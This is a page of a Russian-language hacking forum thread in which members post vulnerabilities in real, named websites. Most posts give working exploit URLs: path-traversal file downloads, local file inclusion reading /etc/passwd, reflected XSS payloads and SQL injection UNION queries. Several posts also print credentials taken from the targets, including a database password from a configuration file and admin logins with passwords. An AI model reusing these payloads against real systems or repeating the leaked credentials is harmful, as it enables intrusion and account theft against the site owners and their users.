HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Уязвимости SQLi, XSS и другие.
   
Ответ
Страница 16 из 35 « Первая < 6 12 13 14 15 16 17 18 19 20 26 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #151  
Старый 20.08.2015, 21:02
hahanovB
Участник форума
Регистрация: 22.07.2013
Сообщений: 260
С нами: 6741686

Репутация: 2
По умолчанию
Type: Arbitrary File Download

Target: tennismatchpoint.net

Vulnerable: www.tennismatchpoint.net/inc/forceDownload.php?file=../admin/index.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$PASSWORD[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'cesenatennis'[/COLOR][COLOR="#007700"];
 if ([/COLOR][COLOR="#0000BB"]$PASSWORD[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]] &&[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'admin'[/COLOR][COLOR="#007700"]){[/COLOR][/COLOR
Логин: admin

Пароль: cesenatennis
 
Ответить с цитированием

  #152  
Старый 20.08.2015, 21:21
hahanovB
Участник форума
Регистрация: 22.07.2013
Сообщений: 260
С нами: 6741686

Репутация: 2
По умолчанию
Type: Arbitrary File Download

Target: requisur.com

Vulnerable: www.requisur.com/pdf/forcedownload.php?file=../configuration.php

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]var[/COLOR][COLOR="#0000BB"]$dbtype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'mysqli'[/COLOR][COLOR="#007700"];
 var[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'localhost'[/COLOR][COLOR="#007700"];
 var[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'gtbaotmh_requisu'[/COLOR][COLOR="#007700"];
 var[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'gtbaotmh_requisu'[/COLOR][COLOR="#007700"];
 var[/COLOR][COLOR="#0000BB"]$dbprefix[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'kxlo_'[/COLOR][COLOR="#007700"];
 var[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'Ry&f#4d*4$0vYk'[/COLOR][COLOR="#007700"];[/COLOR][/COLOR
 
Ответить с цитированием

  #153  
Старый 22.08.2015, 18:00
hahanovB
Участник форума
Регистрация: 22.07.2013
Сообщений: 260
С нами: 6741686

Репутация: 2
По умолчанию
Type: Local File Inclusion

Target: com-onlive.tv

Vulnerable: http://www.com-onlive.tv/wp-content/...9ldGMvcGFzc3dk

Type: Local File Inclusion

Target: garcinia.com-see.tv

Vulnerable: http://garcinia.com-see.tv/wp-conten...9ldGMvcGFzc3dk

Type: Local File Inclusion

Target: garcinia.com-see.tv

Vulnerable: http://www.truhlarstvi-rozkos.cz/fotogalerie.php?id=../../../../../../../../../../etc/passwd
 
Ответить с цитированием

  #154  
Старый 23.08.2015, 12:26
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами: 8374164

Репутация: 0
По умолчанию
target:ykt.ru

Type:XSS-Reflected

Заходим сюда по линке

ykt.ru/search/image?q=&t=0&s=0&sid=14&ws=6941337%22%27&we=

В поиске вводим ">alert("WX")

И видим XSS .
 
Ответить с цитированием

  #155  
Старый 23.08.2015, 14:49
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами: 8374164

Репутация: 0
По умолчанию
target:hochu.ua

Type : XSS-Reflected

Описание :

В поиске вводим : ">alert("WX")

Готовая линка : http://hochu.ua/search/?q=">alert("WX")
 
Ответить с цитированием

  #156  
Старый 24.08.2015, 19:21
joelblack
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
С нами: 5713526

Репутация: 145
По умолчанию
target: http://www.globexbank.ru/

type: XSS Reflected

Курс обмена валют:

Код:
">alert('Hello')
 
Ответить с цитированием

  #157  
Старый 24.08.2015, 23:19
hahanovB
Участник форума
Регистрация: 22.07.2013
Сообщений: 260
С нами: 6741686

Репутация: 2
По умолчанию
Type:SQL Injection

Target:intergips.com.ua

Vulnerable:

Код:
http://intergips.com.ua/index.php?item_id=-3445%27%20UNION%20ALL%20SELECT%20CONCAT%280x717a787a71%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x71786b7171%29--%20
 
Ответить с цитированием

  #158  
Старый 26.08.2015, 23:19
w0rm_
Новичок
Регистрация: 19.08.2015
Сообщений: 11
С нами: 5650166

Репутация: 8
По умолчанию
Type: SQL Injection

Target: *.mystart.com (212 alexa rang)

PoC:

Код:
_ttp://apps2.mystart.com/ui/site/index.php?tb=vmndtxtb&cid=-2+union+select+1,user(),3,4+from+mysql.user+--
File_priv=Y
 
Ответить с цитированием

  #159  
Старый 27.08.2015, 19:52
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию
Цитата:
Сообщение от SaNDER  

Spoiler: admin and pass
roselynef@vmn.net
:adminlox
admin link : apps2.mystart.com/admin/
Добавил XSS : apps2.mystart.com/ui/site/index.php?tb='alert('SIXSS')
кек xss с sql норм так .
SIXSS

http://apps2.mystart.com/ui/site/in...27293c2f7363726970743e,3,4+from+mysql.user+--
 
Ответить с цитированием

  #160  
Старый 29.08.2015, 08:35
sander
Новичок
Регистрация: 14.06.2010
Сообщений: 0
С нами: 8374164

Репутация: 0
По умолчанию
Target:http://www.ecco-shoes.ru/search

Type:XSS-Reflected

Описание: Переходим в любой раздел "Для мужчин/женщин" . Ищем поиск по артиклу и вбиваем в оба поля .

Код:
">alert('Hello') .
а также

Код:
www.ecco-shoes.ru/shops/?country=UNION SELECT 1,2,3,'alert('SIXSS')',5,6 --&region=Архангельская+область&town=Архангельск



Да и вообще на этом сайте много XSS .
 
Ответить с цитированием
Ответ
Страница 16 из 35 « Первая < 6 12 13 14 15 16 17 18 19 20 26 > Последняя »



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.